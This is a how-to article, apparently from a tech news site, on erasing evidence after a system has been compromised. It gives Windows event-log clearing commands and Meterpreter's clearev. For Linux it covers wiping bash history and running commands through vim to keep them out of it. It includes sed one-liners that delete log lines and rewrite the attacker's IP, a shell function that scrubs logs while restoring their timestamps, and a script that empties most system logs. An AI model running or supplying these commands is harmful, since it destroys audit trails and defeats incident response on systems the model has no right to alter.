
Methods and steps for cleaning traces in the post-exploitation stage

2025-01-17 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/03 Report--

This article introduces the methods and steps for cleaning traces in the post-exploitation stage, collected from various sources and reduced to the simple, directly usable operations.

I. Preface

Once the penetration is complete, an attacker who wants to lower the chance of being discovered and traced removes the traces of the attack. This article summarizes the ways of cleaning traces on Windows and on Linux respectively.

II. Windows

Delete logs manually when you have Remote Desktop access:

Start > Programs > Administrative Tools > Computer Management > System Tools > Event Viewer > Clear Log

wevtutil:

wevtutil el               # list the names of all logs on the system
wevtutil cl system        # clear the System log
wevtutil cl application   # clear the Application log
wevtutil cl security      # clear the Security log

Note that clearing is itself logged: clearing the Security log writes Event ID 1102 ("The audit log was cleared") into the freshly emptied Security log, and clearing other logs writes Event ID 104 into the System log. Copies that were already forwarded to a collector (Windows Event Forwarding, a SIEM agent) are not affected by any of these commands.

Meterpreter has a built-in command for clearing logs:

clearev    # clears the Application, System and Security logs on Windows (requires administrative privileges in the session)

Clear recent items:

In File Explorer, click View > Options > General > Privacy and click the "Clear" button; or open C:\Users\Administrator\Recent directly and delete everything in it; or run on the command line:

del /f /s /q "%userprofile%\Recent\*.*"

III. Linux

Clear command history

history -r           # re-read ~/.bash_history into the history list (bash appends the file's contents; it does not by itself discard what was typed in this session)
history -c           # delete all command history held in memory
rm .bash_history     # delete the history file
HISTSIZE=0           # keep no history at all by setting the number of remembered commands to zero

Bash writes the in-memory list to the history file when the shell exits, so run history -c as the last command of the session, or make HISTFILE empty at the start of the session so nothing is written back.

Execute commands from a less visible place: open a file with vim, disable vim's own command-line history with :set history=0, and run shell commands from inside vim with :!command. Commands run this way do not appear in the bash history.

Linux log files

/var/run/utmp        currently logged-in users
/var/log/wtmp        all user logins and logouts
/var/log/lastlog     last login time of each user
/var/log/btmp        failed login attempts
/var/log/auth.log    actions requiring authentication (Debian/Ubuntu)
/var/log/secure      security-related log information (RHEL/CentOS)
/var/log/maillog     mail-related log information
/var/log/messages    system startup messages and general error logs
/var/log/cron        log information related to scheduled tasks
/var/log/spooler     log information related to UUCP and news devices
/var/log/boot.log    log messages related to daemon startup and shutdown

Empty a log file completely (any of the following):

cat /dev/null > filename
: > filename
> filename
echo "" > filename
echo > filename

The first three leave a zero-length file; the two echo forms leave a single newline, so the file is one byte long. Either way a log that is suddenly empty is conspicuous, and for the binary files (wtmp, btmp, lastlog) emptying them makes last and lastlog report nothing at all.

Delete only specific lines (for example every line from the day of the intrusion):

sed -i '/DATE/d' filename     # DATE is the timestamp prefix of the lines to drop, e.g. "Jan 17"

Tamper with the log file:

Replace every occurrence of the attacker's IP 172.16.13.1 with 127.0.0.1 (the dots are escaped so they match literally):

sed -i 's/172\.16\.13\.1/127.0.0.1/g' filename
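The two sed one-liners above are the whole technique, but run as written they have side effects a careful operator would notice: an unescaped or unanchored address also rewrites 172.16.13.10, sed -i replaces the file (new inode), and the modification time jumps to "now". The following function, an added example that is not part of the original article, combines selective line deletion and IP rewriting, anchors the address so it only matches as a whole, writes the result back through the existing inode, and restores the original access and modification times with touch -r. The names scrub_log and make_sample_log and the auth.log-style sample lines are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the original article): selective log scrubbing
# with sed while keeping the file's inode and its original timestamps.

# scrub_log FILE DELETE_PATTERN OLD_IP NEW_IP
#   - drops every line matching DELETE_PATTERN (an ERE without '/', e.g. a date)
#   - rewrites OLD_IP to NEW_IP only where it stands as a complete address,
#     so 172.16.13.1 is left alone inside 172.16.13.10 (one address per line
#     is assumed; two adjacent addresses on one line would need a second pass)
#   - writes back through the same inode and restores atime/mtime
scrub_log() {
    file=$1; del=$2; old_ip=$3; new_ip=$4
    ref=$(mktemp) || return 1
    tmp=$(mktemp) || { rm -f "$ref"; return 1; }
    cp -p "$file" "$ref"                                # snapshot keeps timestamps
    esc=$(printf '%s' "$old_ip" | sed 's/\./\\./g')      # literal dots in the regex
    sed -E -e "/$del/d" \
           -e "s/(^|[^0-9.])${esc}([^0-9.]|$)/\\1${new_ip}\\2/g" "$file" > "$tmp"
    cat "$tmp" > "$file"                                # overwrite in place: same inode
    touch -r "$ref" "$file"                             # put the old atime/mtime back
    rm -f "$ref" "$tmp"
}

# make_sample_log: writes constructed auth.log-style lines to a temp file and
# prints its path. The hostnames, PIDs and addresses are invented.
make_sample_log() {
    f=$(mktemp) || return 1
    cat > "$f" <<'EOF'
Jan 17 09:59:50 web01 sshd[1198]: Failed password for root from 172.16.13.1 port 51100 ssh2
Jan 17 10:01:02 web01 sshd[1201]: Accepted password for root from 172.16.13.1 port 51122 ssh2
Jan 17 10:01:05 web01 sudo:     root : TTY=pts/0 ; PWD=/root ; COMMAND=/bin/bash
Jan 17 10:02:11 web01 sshd[1210]: Failed password for admin from 172.16.13.10 port 51130 ssh2
Jan 16 23:58:40 web01 sshd[1180]: Accepted publickey for deploy from 10.0.0.5 port 40222 ssh2
Jan 17 10:05:00 web01 CRON[1300]: (root) CMD (/usr/bin/backup)
EOF
    touch -t 202401171005 "$f"     # pretend the log was last written at 10:05
    printf '%s\n' "$f"
}

# Demo: drop the two lines from 10:01 (the successful login and the sudo)
# and rewrite the remaining 172.16.13.1 entry to 127.0.0.1.
log=$(make_sample_log)
scrub_log "$log" '10:01:0' '172.16.13.1' '127.0.0.1'
cat "$log"
ls -l "$log"      # mtime still reads Jan 17 10:05
rm -f "$log"
```

The 172.16.13.10 line survives untouched and the file's timestamps are unchanged, which is the check to make after any manual sed edit. None of this helps against copies already shipped to a remote syslog server or kept by journald and auditd, which the sed commands never see.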

One-click clearing script:

#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/.bash_history
history -c

The script must run as root, and because it truncates everything it is the loudest of the options above: a full set of empty logs with fresh modification times is an obvious indicator. It also does not touch the systemd journal, the auditd log or any log already forwarded to a remote collector.

This concludes the study of the methods and steps for cleaning traces in the post-exploitation stage. Pairing the theory with practice is the best way to learn it, so try the commands yourself.
